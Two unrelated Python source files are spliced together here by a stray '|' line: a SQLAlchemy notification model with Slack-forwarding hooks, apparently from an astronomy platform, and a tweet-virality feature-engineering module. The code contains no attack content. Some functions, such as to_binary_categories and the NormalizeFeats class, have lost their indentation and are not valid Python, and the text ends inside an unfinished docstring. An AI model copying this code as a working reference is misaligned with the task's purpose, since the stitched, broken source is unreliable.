from .allocation import Allocation
from .classification import Classification
from .gcn import GcnNotice
from .localization import Localization
from .spectrum import Spectrum
from .comment import Comment
from .listing import Listing
from .facility_transaction import FacilityTransaction
_, cfg = load_env()
class UserNotification(Base):
    """In-app notification delivered to a single user.

    Access control: only the owning user may read, update, or delete the
    notification (``AccessibleIfUserMatches('user')``).
    """

    read = update = delete = AccessibleIfUserMatches('user')

    # Owning user; row is removed when the user is deleted (CASCADE).
    user_id = sa.Column(
        sa.ForeignKey("users.id", ondelete="CASCADE"),
        nullable=False,
        index=True,
        doc="ID of the associated User",
    )
    user = relationship(
        "User",
        back_populates="notifications",
        doc="The associated User",
    )
    text = sa.Column(
        sa.String(),
        nullable=False,
        doc="The notification text to display",
    )
    viewed = sa.Column(
        sa.Boolean,
        nullable=False,
        default=False,
        index=True,
        doc="Boolean indicating whether notification has been viewed.",
    )
    url = sa.Column(
        sa.String(),
        nullable=True,
        doc="URL to which to direct upon click, if relevant",
    )
@event.listens_for(UserNotification, 'after_insert')
def send_slack_notification(mapper, connection, target):
    """Forward a freshly inserted UserNotification to the Slack microservice,
    if the owning user has Slack integration enabled for this category."""
    # Guard clauses: user must exist, have preferences, and have an
    # active Slack integration with a URL matching the expected preamble.
    if not target.user:
        return
    if not target.user.preferences:
        return
    prefs = target.user.preferences.get('slack_integration')
    if not prefs:
        return
    if not prefs.get("active", False):
        return
    integration_url = prefs.get("url", "")
    if not integration_url.startswith(cfg.get("slack.expected_url_preamble", "https")):
        return

    slack_microservice_url = (
        f'http://127.0.0.1:{cfg.get("slack.microservice_port", 64100)}'
    )

    # Classify the notification by its text and map it to the preference
    # key that must be enabled for this category to be forwarded.
    if "mentioned you" in target.text:
        required_pref = "mentions"
    elif "on GcnEvent" in target.text:
        required_pref = "gcnnotices"
    elif "submission" in target.text:
        required_pref = "facilitytransactions"
    else:
        required_pref = "favorite_sources"
    if not prefs.get(required_pref, False):
        return

    app_url = get_app_base_url()
    data = json.dumps(
        {"url": integration_url, "text": f'{target.text} ({app_url}{target.url})'}
    )
    requests.post(
        slack_microservice_url, data=data, headers={'Content-Type': 'application/json'}
    )
@event.listens_for(Classification, 'after_insert')
@event.listens_for(Spectrum, 'after_insert')
@event.listens_for(Comment, 'after_insert')
@event.listens_for(GcnNotice, 'after_insert')
@event.listens_for(FacilityTransaction, 'after_insert')
def add_user_notifications(mapper, connection, target):
    """Queue in-app notifications for interested users after one of the
    listened-for records is inserted.

    The actual work is deferred to the session's ``after_flush`` hook so the
    new row (``target``) is flushed before the related queries run.
    """
    # Add front-end user notifications
    @event.listens_for(DBSession(), "after_flush", once=True)
    def receive_after_flush(session, context):
        # Classify the inserted record by the keys its dict exposes:
        # GcnNotice rows carry 'dateobs', FacilityTransaction rows carry
        # 'initiator_id'; everything else is treated as source activity.
        is_gcnnotice = "dateobs" in target.to_dict()
        is_facility_transaction = "initiator_id" in target.to_dict()
        if is_gcnnotice:
            # Users who opted in to GCN-notice notifications.
            users = User.query.filter(
                User.preferences["slack_integration"]["gcnnotices"]
                .astext.cast(sa.Boolean)
                .is_(True)
            ).all()
        elif is_facility_transaction:
            # Users who opted in to facility-transaction notifications.
            users = User.query.filter(
                User.preferences["slack_integration"]["facilitytransactions"]
                .astext.cast(sa.Boolean)
                .is_(True)
            ).all()
        else:
            # Users who put this object on their "favorites" listing and
            # enabled activity notifications for this record type.
            listing_subquery = (
                Listing.query.filter(Listing.list_name == "favorites")
                .filter(Listing.obj_id == target.obj_id)
                .distinct(Listing.user_id)
                .subquery()
            )
            users = (
                User.query.join(listing_subquery, User.id == listing_subquery.c.user_id)
                .filter(
                    User.preferences["favorite_sources_activity_notifications"][
                        target.__tablename__
                    ]
                    .astext.cast(sa.Boolean)
                    .is_(True)
                )
                .all()
            )
        ws_flow = Flow()
        for user in users:
            # Only notify users who have read access to the new record in question
            if target.__class__.get_if_accessible_by(target.id, user) is not None:
                if is_gcnnotice:
                    session.add(
                        UserNotification(
                            user=user,
                            text=f"New {target.__class__.__name__.lower()} on GcnEvent *{target.dateobs}*",
                            url=f"/gcn_events/{str(target.dateobs).replace(' ','T')}",
                        )
                    )
                elif is_facility_transaction:
                    if "observation_plan_request" in target.to_dict():
                        allocation_id = target.observation_plan_request.allocation_id
                        allocation = session.query(Allocation).get(allocation_id)
                        instrument = allocation.instrument
                        localization_id = (
                            target.observation_plan_request.localization_id
                        )
                        localization = session.query(Localization).get(localization_id)
                        session.add(
                            UserNotification(
                                user=user,
                                text=f"New observation plan submission for GcnEvent *{localization.dateobs}* by *{instrument.name}*",
                                url=f"/gcn_events/{str(localization.dateobs).replace(' ','T')}",
                            )
                        )
                    elif "followup_request" in target.to_dict():
                        allocation_id = target.followup_request.allocation_id
                        allocation = session.query(Allocation).get(allocation_id)
                        instrument = allocation.instrument
                        session.add(
                            UserNotification(
                                user=user,
                                text=f"New follow-up submission for object *{target.followup_request.obj_id}* by *{instrument.name}*",
                                url=f"/source/{target.followup_request.obj_id}",
                            )
                        )
                else:
                    session.add(
                        UserNotification(
                            user=user,
                            text=f"New {target.__class__.__name__.lower()} on your favorite source *{target.obj_id}*",
                            url=f"/source/{target.obj_id}",
                        )
                    )
                # Tell the user's frontend session to refetch notifications.
                ws_flow.push(user.id, "skyportal/FETCH_NOTIFICATIONS")
|
# Standard library
import gc
import os
import warnings
from collections import defaultdict
from multiprocessing import cpu_count

# Third-party
import joblib
import numpy as np
import pandas as pd
import torch
from joblib import parallel_backend
from sklearn.model_selection import KFold, StratifiedKFold
from sklearn.preprocessing import LabelBinarizer, StandardScaler
from tqdm import tqdm
# Silence library warnings and tune pandas display for interactive use.
warnings.filterwarnings('ignore')
pd.set_option("display.max_colwidth", 100)
pd.set_option("display.max_rows", 20)

# Short aliases used throughout this module.
osj = os.path.join
osl = os.listdir

# Degree of parallelism handed to joblib backends.
n_cpus = cpu_count()
class ViralDataset(torch.utils.data.Dataset):
    """Tabular dataset over df[feat_cols]; yields (features, virality label)
    tensors, or features only when mode == 'test'."""

    def __init__(self, df: pd.DataFrame, feat_cols: list, mode: str):
        self.X = df[feat_cols].values
        self.mode = mode
        if mode != 'test':
            # Integer class labels, only needed for train/validation.
            self.targets = df['virality'].values

    def __len__(self):
        return self.X.shape[0]

    def __getitem__(self, idx):
        features = torch.tensor(self.X[idx], dtype=torch.float32)
        if self.mode == 'test':
            return features
        label = torch.tensor(self.targets[idx], dtype=torch.long)
        return features, label
class ExtractFeatsDataset(torch.utils.data.Dataset):
    """Tabular dataset with configurable target column(s).

    A single target column is treated as integer class labels (long);
    multiple target columns become a float32 vector.  mode == 'test'
    yields features only.
    """

    def __init__(self, df: pd.DataFrame, feat_cols: list, target_cols: list, mode: str):
        self.X = df[feat_cols].values
        self.mode = mode
        if mode != 'test':
            single_target = len(target_cols) == 1
            self.targets = (
                df[target_cols[0]].values if single_target else df[target_cols].values
            )
            self.target_dtype = torch.long if single_target else torch.float32

    def __len__(self):
        return self.X.shape[0]

    def __getitem__(self, idx):
        features = torch.tensor(self.X[idx], dtype=torch.float32)
        if self.mode == 'test':
            return features
        target = torch.tensor(self.targets[idx], dtype=self.target_dtype)
        return features, target
def to_binary_categories(df, cat_col='tweet_language_id'):
df.loc[:, cat_col] = (df[cat_col]!=0).astype(np.int8)
return df
def freq_encoding(df, freq_cols: list, main_col='tweet_id'):
    """Frequency-encode each column in freq_cols: add '<col>_freq' holding the
    number of rows sharing that column's value (counted via main_col)."""
    for col in freq_cols:
        freq_name = '{}_freq'.format(col)
        counts = (
            df.groupby([col])[main_col]
            .count()
            .reset_index()
            .rename(columns={main_col: freq_name})
        )
        df = df.merge(counts, how='left', on=col)
    return df
def bin_feats(df, feats=[], n_bins_default=20):
    """Quantile-bin each feature into '<feat>_binned' integer codes.

    Bin edges are the de-duplicated quantiles of the column; values on the
    lowest edge fall outside the (right-closed) bins and get code -1.
    """
    n_bins_for = defaultdict(lambda: n_bins_default)
    n_bins_for['user_tweet_count'] = 20  # explicit override (same as default)
    for feat in feats:
        if '_binned' in feat:
            continue  # already a binned column
        n_bins = n_bins_for[feat]
        if not n_bins:
            continue
        edges = np.unique(df[feat].quantile(np.linspace(0, 1, n_bins)).values)
        df[feat + '_binned'] = pd.cut(
            df[feat], bins=edges, duplicates='drop'
        ).cat.codes
    return df
def to_categorical(df):
    """Cast the known boolean-like columns to pandas 'category' dtype."""
    for col in ('tweet_has_attachment', 'user_has_location',
                'user_has_url', 'user_verified'):
        df[col] = df[col].astype('category')
    return df
def change2float32(df):
    """Downcast every float64 column to float32 to halve memory usage."""
    for col in df.select_dtypes('float64').columns:
        df[col] = df[col].astype(np.float32)
    return df
def merge_df2media(df, df_media):
    """Aggregate per-media vectors to one row per tweet and merge into df.

    Adds to ``df``:
      * the per-tweet mean of each media feature column,
      * 'num_media'       -- count of distinct media items (0 when none),
      * 'tweet_has_media' -- boolean flag (False when none).

    Fix: the original dropped 'media_id' from ``df_media`` in place,
    mutating the caller's frame as a side effect; it now works on a copy.
    """
    # Count distinct media per tweet before discarding the id column.
    num_media = df_media.groupby('tweet_id')['media_id'].nunique().reset_index()
    num_media.columns = ['tweet_id', 'num_media']
    # Non-mutating drop: the caller's df_media keeps its 'media_id' column.
    media = df_media.drop('media_id', axis=1)
    media = media.merge(num_media, how='left', on='tweet_id')
    media_cols = [col for col in media if col not in ['tweet_id', 'media_id']]
    # Tweets with several media items get the mean of each feature.
    media = media.groupby('tweet_id')[media_cols].mean().reset_index()
    media['tweet_has_media'] = True
    df = df.merge(media, how='left', on='tweet_id')
    # Tweets with no media row get explicit defaults instead of NaN.
    df['tweet_has_media'] = df['tweet_has_media'].fillna(False)
    df['num_media'] = df['num_media'].fillna(0).astype(np.int8)
    return df
# def add_num_media_user(df):
# # todo when not debug: df['num_media'].equals(df['num_media_user'])
# num_media_user = df.groupby('tweet_id')['num_media'].sum().reset_index()
# num_media_user.columns = ['tweet_id','num_media_user']
# df = df.merge(num_media_user, how='left', on='tweet_id')
# df['num_media_user'] = df['num_media_user'].astype(np.int8)
# return df
def tweets_user_created_date(df):
    """Add per-user counts of tweets per creation-period value.

    For each of year/month/day/hour, adds columns
    'tweets_in_<period>_<value>' holding how many tweets the user posted
    in that period value (0 where the user has none).

    Fix: the original built column names with an f-string that reused
    double quotes inside a double-quoted literal
    (``f"..._{feat_.split("_")[-1]}_"``), a SyntaxError on every Python
    before 3.12 (PEP 701); rewritten with single quotes for portability.
    """
    for feat in ['tweet_created_at_year', 'tweet_created_at_month',
                 'tweet_created_at_day', 'tweet_created_at_hour']:
        period = feat.split('_')[-1]  # 'year' / 'month' / 'day' / 'hour'
        # Per-user histogram of the period values.
        counts = df.groupby('tweet_user_id')[feat].apply(lambda x: x.value_counts())
        counts = counts.unstack(level=1)
        counts.columns = [f"tweets_in_{period}_" + str(col) for col in counts.columns]
        counts = counts.fillna(0).reset_index()
        df = df.merge(counts, how='left', on='tweet_user_id')
    return df
def create_date_col(df):
    """Combine tweet year/month/day columns into one datetime 'date' column."""
    parts = ['tweet_created_at_year', 'tweet_created_at_month', 'tweet_created_at_day']

    def _row_to_datestr(row):
        # Build an M/D/Y string, matching pd.to_datetime's default parsing.
        return (str(row['tweet_created_at_month']).strip() + '/'
                + str(row['tweet_created_at_day']).strip() + '/'
                + str(row['tweet_created_at_year']).strip())

    df['date'] = pd.to_datetime(df[parts].apply(_row_to_datestr, axis=1))
    return df
def add_sincos(df):
    """Add cyclical encodings 'sin_hour' / 'cos_hour' of the tweet hour."""
    angle = 2 * np.pi * df['tweet_created_at_hour'] / 24.0
    sin_hour = np.sin(angle)
    sin_hour.name = 'sin_hour'
    cos_hour = np.cos(angle)
    cos_hour.name = 'cos_hour'
    return df.join([sin_hour, cos_hour])
def add_dummy_dates(df):
    """One-hot encode tweet/user creation-date parts via pd.get_dummies."""
    specs = [
        ('tweet_created_at_year', 'ohe_year'),
        ('tweet_created_at_month', 'ohe_month'),
        ('tweet_created_at_day', 'ohe_day'),
        ('user_created_at_year', 'ohe_user_year'),
        ('user_created_at_month', 'ohe_user_month'),
    ]
    dummies = [pd.get_dummies(df[col], prefix=prefix) for col, prefix in specs]
    return df.join(dummies)
def add_date_feats(df):
    """Derive date-based features.

    Steps: build a 'date' column; add sin/cos hour and one-hot date parts;
    per user, resample the hashtag/url/mention counts quarterly and spread
    the aggregates into wide columns; add age-normalized ratio features;
    finally drop the raw date-part columns.

    Note: the set_index('date') / reset_index() pair inside the loop is
    deliberate — resample() needs a DatetimeIndex, and the merge needs it
    back as a column.
    """
    # todo OHE date
    # todo to sin, cos(date)
    #df_old_index = df.index
    df = create_date_col(df)
    df = add_sincos(df)
    df = add_dummy_dates(df)
    cols_resample = ['tweet_hashtag_count', 'tweet_url_count', 'tweet_mention_count',
                     ]
    date_freqs = ['1Q'] # ,'1M']
    # todo DON't use _func_min if does not affect CV (low feat importance)
    stats = ['sum','mean','std','max'] # ['mean', 'max', 'min', 'median', 'std']
    for freq_ in date_freqs:
        for stat_ in stats:
            # DatetimeIndex required by resample() below.
            df.set_index('date', inplace=True)
            g = (df.groupby('tweet_user_id').resample(freq_, closed='left')
                 [cols_resample].agg(stat_)
                 .astype(np.float32)
                 ) # .set_index('date'))
            # Wide layout: one column per (feature, quarter) pair.
            g = g.unstack('date').fillna(0)
            g.columns = [col1 + f'_func_{stat_}_' + col2.strftime('%Y-%m-%d') for (col1, col2) in g.columns]
            g.reset_index(inplace=True)
            # g = g.rename(columns ={col: f"{col}_rsmpl_{freq_}_func_{stat_}"
            #                        for col in g.columns if col not in ['tweet_user_id','date']})
            #df = df.reset_index().merge(g, how='left', on='tweet_user_id')
            df = df.reset_index().merge(g, how='left', on='tweet_user_id')
    # df.reset_index(drop=False, inplace=True)
    # todo count 'tweet_id' for each period for user
    # Fixed "today" reference keeps the feature reproducible across runs.
    today = pd.to_datetime('7/1/2021')
    df['days_since_tweet'] = (today - df['date']).dt.days # .astype(int)
    # Per-day (age-normalized) rates.
    df['user_followers_count_2days'] = df['user_followers_count'] / df['days_since_tweet']
    df['user_following_count_2days'] = df['user_following_count'] / df['days_since_tweet']
    df['user_listed_on_count_2days'] = df['user_listed_on_count'] / df['days_since_tweet']
    df['user_tweet_count_2days'] = df['user_tweet_count'] / df['days_since_tweet']
    df['tweet_hashtag_count_2days'] = df['tweet_hashtag_count'] / df['days_since_tweet']
    df['tweet_mention_count_2days'] = df['tweet_mention_count'] / df['days_since_tweet']
    df['tweet_url_count_2days'] = df['tweet_url_count'] / df['days_since_tweet']
    # todo not a date related functions:
    # NOTE(review): some assignments below are exact duplicates
    # (e.g. tweet_mention_count_div_followers) — harmless no-op repeats.
    df['tweet_mention_count_div_followers'] = df['tweet_mention_count'].divide(df['user_followers_count']+1)
    df['tweet_url_count_div_followers'] = df['tweet_url_count'].divide(df['user_followers_count']+1)
    df['tweet_hashtag_count_div_followers'] = df['tweet_hashtag_count'].divide(df['user_followers_count']+1)
    df['tweet_mention_count_div_followers'] = df['tweet_mention_count'].divide(df['user_followers_count']+1)
    df['tweet_mention_count_div_n_tweets'] = df['tweet_mention_count'].divide(df['user_tweet_count']+1)
    df['tweet_url_count_div_n_tweets'] = df['tweet_url_count'].divide(df['user_tweet_count']+1)
    df['tweet_hashtag_count_div_n_tweets'] = df['tweet_hashtag_count'].divide(df['user_tweet_count']+1)
    df['tweet_mention_count_div_n_tweets'] = df['tweet_mention_count'].divide(df['user_tweet_count']+1)
    df['tweet_mention_count_div_likes'] = df['tweet_mention_count'].divide(df['user_like_count']+1)
    df['tweet_url_count_div_likes'] = df['tweet_url_count'].divide(df['user_like_count']+1)
    df['tweet_hashtag_count_div_likes'] = df['tweet_hashtag_count'].divide(df['user_like_count']+1)
    df['tweet_mention_count_div_likes'] = df['tweet_mention_count'].divide(df['user_like_count']+1)
    # Raw date parts are no longer needed once the derived features exist.
    cols_drop = ['date', 'tweet_created_at_year', 'tweet_created_at_month',
                 'tweet_created_at_day',
                 'user_created_at_year', 'user_created_at_month']
    df.drop(cols_drop, axis=1, inplace=True)
    return df
def ohe_func(df, cat_col, ohe_tfm=None, prefix=None):
    """One-hot encode one categorical column of df.

    Parameters
    ----------
    df : pd.DataFrame
    cat_col : str
        Column to encode; it is dropped from the result.
    ohe_tfm : object with fit/transform, optional
        Encoder to use.  Fix: the original default was a *shared*
        ``LabelBinarizer()`` instance created once at import time
        (mutable-default pitfall); a fresh instance is now created per call.
    prefix : str, optional
        Extra prefix for the generated column names.

    Returns
    -------
    df with '<prefix>_<cat_col>_<i>' (or '<cat_col>_<i>') columns appended.
    """
    if ohe_tfm is None:
        ohe_tfm = LabelBinarizer()
    ohe_tfm.fit(df[cat_col])
    encoded = ohe_tfm.transform(df[cat_col])
    if prefix:
        cat_cols = [f'{prefix}_{cat_col}_{i}' for i in range(encoded.shape[1])]
    else:
        cat_cols = [f'{cat_col}_{i}' for i in range(encoded.shape[1])]
    ohe_df = pd.DataFrame(encoded, index=df.index, columns=cat_cols)
    df = pd.concat([df, ohe_df], axis=1)
    df.drop(cat_col, axis=1, inplace=True)
    return df
def drop_unnecessary_cols(cfg, df):
    """Drop one-hot language-id columns for rare languages (ids 0, 1 and 3
    are kept) when both config flags enable it."""
    to_drop = []
    if cfg.drop_rare_ohe_language_ids and cfg.one_hot_encode:
        keep_ids = {0, 1, 3}
        to_drop.extend(
            f'tweet_language_id_{i}' for i in range(31) if i not in keep_ids
        )
    # Only drop columns actually present in df.
    present = [col for col in to_drop if col in df.columns]
    if present:
        df.drop(columns=present, inplace=True)
    return df
class Features():
    """Feature-engineering pipeline for the tweet-virality data.

    Stage 1 loads and merges the raw CSVs (tweets, media vectors, text
    vectors, user data); stage 2 derives features and returns the
    train/test split (test rows are those with no 'virality' label).
    """

    def __init__(self,):
        self.transformers = {}
        # Fill value for missing media-image features.
        self.impute_img_feature_nulls = -1
        self.media_img_feat_cols = []
        self.text_feat_cols = []
        self.user_des_feat_cols = []
        self.user_img_feat_cols = []
        # union of topic ids in train and test , 0 - nan value, min=36, max=172
        # xor train, test = [ 38, 117, 123, 165]
        # in test but not in train = [ 38, 117, 123]
        self.unique_topic_ids = [ 0, 36, 37, 38, 39, 43, 44, 45, 52, 58, 59, 60, 61,
            63, 68, 71, 72, 73, 78, 79, 80, 81, 82, 87, 88, 89,
            91, 93, 98, 99, 100, 101, 104, 111, 112, 117, 118, 119, 120,
            121, 122, 123, 125, 126, 127, 147, 148, 149, 150, 151, 152, 153,
            155, 156, 163, 165, 169, 170, 171, 172]
        # Columns safe to downcast to int8 (when null-free).
        self.cols2int8 = ['fold', 'user_created_at_month', 'tweet_created_at_day', 'tweet_created_at_hour',
            'tweet_hashtag_count', 'tweet_url_count', 'tweet_mention_count', 'tweet_has_attachment',
            'virality', 'tweet_has_media', 'user_has_url', 'user_verified', 'num_media',
            'user_id', 'tweet_user_id']
        # 'tweet_created_at_year', 'user_created_at_year',
        self.cols2int8 += [f'tweet_language_id_{i}' for i in range(30)]

    def get_data_stage1(self, cfg, base_dir, n_samples=int(1e10)):
        """Read and merge all raw CSVs under base_dir into one DataFrame.

        Train and test tweets are concatenated (test rows lack 'virality').
        ``n_samples`` caps the rows read per tweets file (debugging aid).
        """
        df = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets.csv'), nrows=n_samples)
        test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets.csv'), nrows=n_samples)
        # test_tweet_ids = test['tweet_id'].to_list()
        # self.tabular_feats.append()
        df = pd.concat([df, test])
        del test; _ = gc.collect()
        df = change2float32(df)
        df = self.optimize_ints(df)
        #df.drop('tweet_attachment_class', axis=1, inplace=True)
        # try using 'media_id' columns
        df_media = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets_vectorized_media.csv'))
        df_media_test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets_vectorized_media.csv'))
        df_media = pd.concat([df_media, df_media_test])
        df_media = change2float32(df_media)
        df = merge_df2media(df, df_media)
        del df_media, df_media_test; _ = gc.collect()
        df_text = pd.read_csv(osj(base_dir, 'Tweets',f'train_tweets_vectorized_text.csv'))
        df_text_test = pd.read_csv(osj(base_dir, 'Tweets',f'test_tweets_vectorized_text.csv'))
        df_text = pd.concat([df_text, df_text_test])
        text_feat_cols = ['text_'+ col for col in df_text.columns if col.startswith('feature_')]
        df_text.columns = ['tweet_id'] + text_feat_cols
        # Log transform; +13 shift keeps the argument positive.
        df_text.loc[:, text_feat_cols] = np.log(df_text[text_feat_cols] + 13)
        df_text = change2float32(df_text)
        df = df.merge(df_text, how='left', on='tweet_id')
        del df_text, df_text_test; _ = gc.collect()
        users = pd.read_csv(osj(base_dir, 'Users','users.csv'))
        # log of _count feats
        users_des = pd.read_csv(osj(base_dir, 'Users','user_vectorized_descriptions.csv'))
        # for col in ['tweet_hashtag_count','tweet_url_count','tweet_mention_count']:
        #     users[col] = users[col].astype(int)
        users_img = pd.read_csv(osj(base_dir, 'Users','user_vectorized_profile_images.csv'))
        user_des_feat_cols = ['user_des_'+col for col in users_des.columns if col.startswith('feature')]
        users_des.columns = ['user_id'] + user_des_feat_cols
        user_img_feat_cols = ['user_img_'+col for col in users_img.columns if col.startswith('feature')]
        users_img.columns = ['user_id'] + user_img_feat_cols
        # user_data = users # .merge(users, how='left', on='user_id')
        user_data = users.merge(users_des, how='left', on='user_id')
        user_data = user_data.merge(users_img, how='left', on='user_id')
        user_data = change2float32(user_data)
        user_data = self.optimize_ints(user_data) # # no nulls in user_data 25-may
        df = df.merge(user_data, how='left', left_on='tweet_user_id', right_on='user_id')
        df.drop('user_id', axis=1, inplace=True)
        # Optionally drop heavy vectorized feature groups per cfg flags.
        df = cond_drop_imgtext(cfg, df)
        # df = add_num_media_user(df)
        del users_des, users_img, user_data;
        _ = gc.collect()
        return df # , test_tweet_ids

    def get_data_stage2(self, cfg, df):
        """Derive features on the merged frame and split train/test.

        Returns (train, test): test rows are those whose 'virality' is null.
        """
        df = tweets_user_created_date(df) # add feats: number of user tweets in time period (year, month, day, hour)
        df = add_date_feats(df)
        df = bin_feats(df, feats=['tweet_mention_count','user_tweet_count',
                                  'user_followers_count','user_following_count',
                                  'user_listed_on_count'])
        df = add_topic_count(df)
        df = add_topic_ids(df)
        bool_cols = df.select_dtypes(include='bool').columns
        df[bool_cols] = df[bool_cols].astype(np.int8)
        if cfg.one_hot_encode:
            df = ohe_func(df, cat_col='tweet_language_id', ohe_tfm=LabelBinarizer())
            df = ohe_func(df, cat_col='tweet_attachment_class', ohe_tfm=LabelBinarizer())
        else:
            # Label-encode instead of one-hot when OHE is disabled.
            df['tweet_attachment_class'] = df['tweet_attachment_class'].astype('category').cat.codes
            # df = to_binary_categories(df, cat_col='tweet_language_id')
        media_img_feat_cols = [col for col in df.columns if col.startswith('img_feature_')]
        if cfg.impute_nulls:
            df.loc[:,media_img_feat_cols] = df[media_img_feat_cols].fillna(self.impute_img_feature_nulls)
        if cfg.add_user_virality:
            df = self.add_virality_feature(df)
        df = freq_encoding(df, freq_cols=['tweet_user_id'], main_col='tweet_id')
        df = drop_unnecessary_cols(cfg, df)
        # log (feats) :
        cols2log = ['user_like_count','user_followers_count',
                    'user_following_count', 'user_listed_on_count',
                    'user_tweet_count']
        # 'tweet_hashtag_count' , 'tweet_url_count', 'tweet_mention_count'
        cols2log = [col for col in df.columns if col in cols2log]
        df = logtransform(df, cols2log)
        # print("df.shape after merging all csv files:", df.shape)
        # print("df.dtypes.value_counts():\n", df.dtypes.value_counts())
        # train = df[~df['tweet_id'].isin(test_tweet_ids)]
        # test = df[df['tweet_id'].isin(test_tweet_ids)]
        train = df[~df['virality'].isnull()]
        test = df[df['virality'].isnull()]
        # NOTE(review): `test` is a slice of df; this del may trigger a
        # SettingWithCopy warning — verify intended.
        del test['virality']; _ = gc.collect()
        print(f"train.shape = {train.shape}, test.shape = {test.shape}")
        return train, test
    # end of def get_data

    def add_virality_feature(self, df):
        """Add 'user_virality' = mean training virality of each user."""
        df_train = df[~df['virality'].isnull()]
        viral_user = df_train.groupby('tweet_user_id')['virality'].mean().reset_index()
        viral_user.columns = ['tweet_user_id', 'user_virality']
        df = df.merge(viral_user, how='left', on='tweet_user_id')
        return df

    def optimize_ints(self, df):
        """Downcast the known small-range columns to int8 (null-free only)."""
        int8_candidates = self.cols2int8
        # for col in ['tweet_created_at_year', 'user_created_at_year']:
        #     if col in df.columns:
        #         df.loc[:, col] = df.loc[:, col] - 2000
        #         df.loc[:, col] = df.loc[:, col].astype(np.int8)
        for col in int8_candidates:
            if (col in df.columns) and (df[col].isnull().sum()==0):
                df.loc[:, col] = df.loc[:, col].astype(np.int8)
        return df
# end of class Features
def logtransform(df, cols2log):
    """Replace each listed column with log(value + 2); returns df."""
    shifted = df[cols2log] + 2
    df.loc[:, cols2log] = np.log(shifted)
    return df
class NormalizeFeats_Parallel():
    """Per-column feature scaling using a joblib threading backend.

    https://scikit-learn.org/stable/computing/parallelism.html
    """

    def __init__(self, feat_cols: list):
        self.feat_cols = feat_cols   # columns to scale
        self.scalers_dict = {}       # col -> fitted scaler

    def normalize_data(self, df, mode='train', scaler=None):
        """Fit (mode='train') or apply (any other mode) one scaler per column.

        Fixes vs. original:
          * the same scaler object was stored for *every* column (each fit
            overwrote the previous one), so in 'test' mode all columns were
            transformed with the statistics of the last trained column — a
            fresh ``copy.deepcopy`` is now fitted and stored per column;
          * the mutable default ``scaler=StandardScaler()`` (one shared
            instance across calls) was replaced by None -> fresh instance.
        """
        import copy
        if scaler is None:
            scaler = StandardScaler()
        if mode == 'train':
            for col in self.feat_cols:
                col_scaler = copy.deepcopy(scaler)  # independent stats per column
                with parallel_backend('threading', n_jobs=n_cpus):
                    col_scaler.fit(df[col].values.reshape(-1, 1))
                self.scalers_dict[col] = col_scaler
                df.loc[:, col] = col_scaler.transform(df[col].values.reshape(-1, 1))
        else:
            for col in self.feat_cols:
                with parallel_backend('threading', n_jobs=n_cpus):
                    df.loc[:, col] = self.scalers_dict[col].transform(df[col].values.reshape(-1, 1))
        return df
# end of NormalizeFeats_Parallel class
class NormalizeFeats():
def __init__(self, feat_cols: list):
self.feat_cols = feat_cols
self.scalers_dict = {}
def normalize_data(self, df, mode='train', scaler=StandardScaler()):
if mode =='train':
for col in self.feat_cols:
scaler.fit(df[col].values.reshape(-1,1))
self.scalers_dict[col] = scaler
# scaler.fit(df[feat_cols].values)
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
else:
for col in self.feat_cols:
df.loc[:,col] = self.scalers_dict[col].transform(df[col].values.reshape(-1,1))
return df
# end of NormalizeFeats class
def transform_joint(train, test=None, norm_cols=None, tfm=None):
    """Fit ``tfm`` on train(+test) jointly and transform norm_cols in place.

    Columns are processed in chunks of 1000 to bound peak memory.
    Returns (train, test); ``test`` may be None.

    Fixes vs. original:
      * mutable default ``tfm=StandardScaler()`` (one shared, repeatedly
        re-fitted instance across all calls) replaced by None -> fresh
        instance per call;
      * removed an unused ``scaler = StandardScaler()`` local in the
        chunked branch (it was created but never used — ``tfm`` is fitted).
    """
    if tfm is None:
        tfm = StandardScaler()
    l_train = len(train)
    if isinstance(test, pd.DataFrame):
        assert train[norm_cols].columns.equals(test[norm_cols].columns)
    # Chunk the columns so very wide frames don't blow up memory.
    col_chunks = [norm_cols[i:i + 1000] for i in range(0, len(norm_cols), 1000)]
    for cols_chunk in col_chunks:
        if isinstance(test, pd.DataFrame):
            data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
        else:
            data_chunk = train[cols_chunk].values
        with parallel_backend('threading', n_jobs=n_cpus):
            tfm.fit(data_chunk)
        data_chunk = tfm.transform(data_chunk)
        train.loc[:, cols_chunk] = data_chunk[:l_train]  # todo LONGEST RUNTIME and memory
        if isinstance(test, pd.DataFrame):
            test.loc[:, cols_chunk] = data_chunk[l_train:]  # todo LONGEST RUNTIME and memory
    return train, test  # test can be None
def normalize_npnan(train, test=None, norm_cols=[]):
    """Z-score norm_cols with NaN-aware statistics, in place.

    The mean/std (ddof=0) are computed jointly over train and (optionally)
    test, ignoring NaNs.  Columns are processed in chunks of 1000 to bound
    peak memory.  Returns (train, test); ``test`` may be None.
    """
    if len(norm_cols) == 0:
        raise NotImplementedError
    n_train_rows = len(train)
    chunks = [norm_cols[i:i + 1000] for i in range(0, len(norm_cols), 1000)]
    for chunk in chunks:
        if isinstance(test, pd.DataFrame):
            joint = pd.concat([train[chunk], test[chunk]]).values
        else:
            joint = train[chunk].values
        joint = (joint - np.nanmean(joint, axis=0)) / np.nanstd(joint, axis=0)
        train.loc[:, chunk] = joint[:n_train_rows]
        if isinstance(test, pd.DataFrame):
            test.loc[:, chunk] = joint[n_train_rows:]
    return train, test
def normalize_joint(train, test=None, norm_cols=None):
    """StandardScaler-normalize norm_cols over train(+test) jointly, in place.

    A fresh scaler is fitted per 1000-column chunk (chunking bounds peak
    memory).  Returns (train, test); ``test`` may be None.
    """
    n_train_rows = len(train)
    chunks = [norm_cols[i:i + 1000] for i in range(0, len(norm_cols), 1000)]
    for chunk in chunks:
        if isinstance(test, pd.DataFrame):
            assert train[norm_cols].columns.equals(test[norm_cols].columns)
            block = pd.concat([train[chunk], test[chunk]]).values
        else:
            block = train[chunk].values
        chunk_scaler = StandardScaler()
        with parallel_backend('threading', n_jobs=n_cpus):
            chunk_scaler.fit(block)
        block = chunk_scaler.transform(block)
        train.loc[:, chunk] = block[:n_train_rows]  # todo LONGEST RUNTIME and memory
        if isinstance(test, pd.DataFrame):
            test.loc[:, chunk] = block[n_train_rows:]  # todo LONGEST RUNTIME and memory
    return train, test  # test can be None
def normalize_joint_parallel(train, test, norm_cols, num_workers=6):
    """StandardScaler-normalize norm_cols over train and test jointly, in place.

